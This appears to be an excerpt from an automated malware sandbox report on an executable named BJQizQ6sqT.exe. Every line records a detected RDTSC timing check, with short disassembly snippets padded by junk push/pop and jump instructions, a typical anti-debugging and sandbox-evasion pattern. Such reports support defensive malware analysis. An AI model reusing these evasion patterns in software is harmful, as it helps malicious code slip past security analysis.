              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C932BA second address: C932C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC040F643F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C932C6 second address: C932D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C93765 second address: C93787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC040F64404h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FC040F643F8h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C93787 second address: C93791 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC0410B9FB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C93791 second address: C9379F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC040F643F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C9379F second address: C937A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C93A5D second address: C93A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C948C5 second address: C948CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C94E44 second address: C94E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FC040F643F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C94E52 second address: C94E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C9846C second address: C9847E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC040F643F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C9847E second address: C984B7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC0410B9FA6h 0x00000008 jmp 00007FC0410B9FB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FC0410B9FAFh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jg 00007FC0410B9FA6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C984B7 second address: C984BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C9877E second address: C98784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C98CF2 second address: C98CFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C98CFB second address: C98D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C98D01 second address: C98D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C9DBC7 second address: C9DBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC0410B9FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC0410B9FA6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA22DF second address: CA22E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA22E4 second address: CA22EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA22EA second address: CA22F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA22F0 second address: CA22F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CAA258 second address: CAA289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F64407h 0x00000009 jmp 00007FC040F64406h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CAA289 second address: CAA28D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA84C0 second address: CA84F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64405h 0x00000007 jmp 00007FC040F64400h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA84F1 second address: CA84F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA84F5 second address: CA8542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC040F64407h 0x00000010 jmp 00007FC040F64408h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA8542 second address: CA8548 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA8548 second address: CA854E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA854E second address: CA8554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA8AE4 second address: CA8AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA8AE8 second address: CA8AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC0410B9FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FC0410B9FB2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA8AFC second address: CA8B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF2030 second address: BF2038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF2038 second address: BF2065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC040F64406h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jp 00007FC040F643F8h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA8EC8 second address: CA8ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA91C4 second address: CA91CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA92F7 second address: CA9313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FC0410B9FABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA9313 second address: CA9325 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC040F643FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA9325 second address: CA9329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CA9A67 second address: CA9A6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CBDD4F second address: CBDD55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CC0D49 second address: CC0D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CC0A3D second address: CC0A43 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CC0A43 second address: CC0A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FC040F643F6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CC0A53 second address: CC0A5F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC0410B9FA6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CC0A5F second address: CC0A7B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC040F643FEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FC040F64410h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CC0A7B second address: CC0A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CC0A81 second address: CC0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CC0A85 second address: CC0A8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CCFF84 second address: CCFF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16B5 second address: CD16BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC0410B9FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16BF second address: CD16C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16C3 second address: CD16CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16CB second address: CD16D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16D1 second address: CD16E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC0410B9FB1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16E6 second address: CD16F7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC040F643F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16F7 second address: CD16FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16FF second address: CD170C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC040F643F8h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD925D second address: CD928D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007FC0410B9FA6h 0x00000009 pop eax 0x0000000a jno 00007FC0410B9FBCh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD81AB second address: CD81D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC040F64409h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD81D1 second address: CD81D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD81D5 second address: CD81F1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC040F643F6h 0x00000008 jmp 00007FC040F64402h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD81F1 second address: CD81F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8351 second address: CD8366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8366 second address: CD836A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8F96 second address: CD8FBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC040F64408h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8FBC second address: CD8FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FC0410B9FA6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8FCA second address: CD8FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDF2B6 second address: CDF2C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC0410B9FA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEE22 second address: CDEE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64400h 0x00000009 jp 00007FC040F643F6h 0x0000000f popad 0x00000010 jnp 00007FC040F643F8h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEE45 second address: CDEE50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FC0410B9FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEF97 second address: CDEF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEF9B second address: CDEFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC0410B9FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jno 00007FC0410B9FA6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e ja 00007FC0410B9FA6h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEFBF second address: CDEFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0B2 second address: CFA0DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC0410B9FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 jbe 00007FC0410B9FB0h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0DC second address: CFA0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0E0 second address: CFA0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0E4 second address: CFA0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0EA second address: CFA0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FC0410B9FA8h 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFC0C8 second address: CFC0CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFC0CC second address: CFC0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC0410B9FBBh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFC0F0 second address: CFC0FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFC0FC second address: CFC100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFBC30 second address: CFBC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFBC36 second address: CFBC3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFBDB6 second address: CFBDD7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC040F643F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FC040F643F6h 0x0000001b jns 00007FC040F643F6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFBDD7 second address: CFBDDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D1309B second address: D130CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FC040F643F6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push ecx 0x00000010 jmp 00007FC040F64408h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D130CA second address: D130D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D130D0 second address: D130D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D11F25 second address: D11F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC0410B9FA6h 0x0000000a pop edi 0x0000000b push ebx 0x0000000c jne 00007FC0410B9FA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D11F39 second address: D11F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12216 second address: D1221A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D1235C second address: D12378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC040F643F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC040F643FFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12378 second address: D1237E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D124C5 second address: D124C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
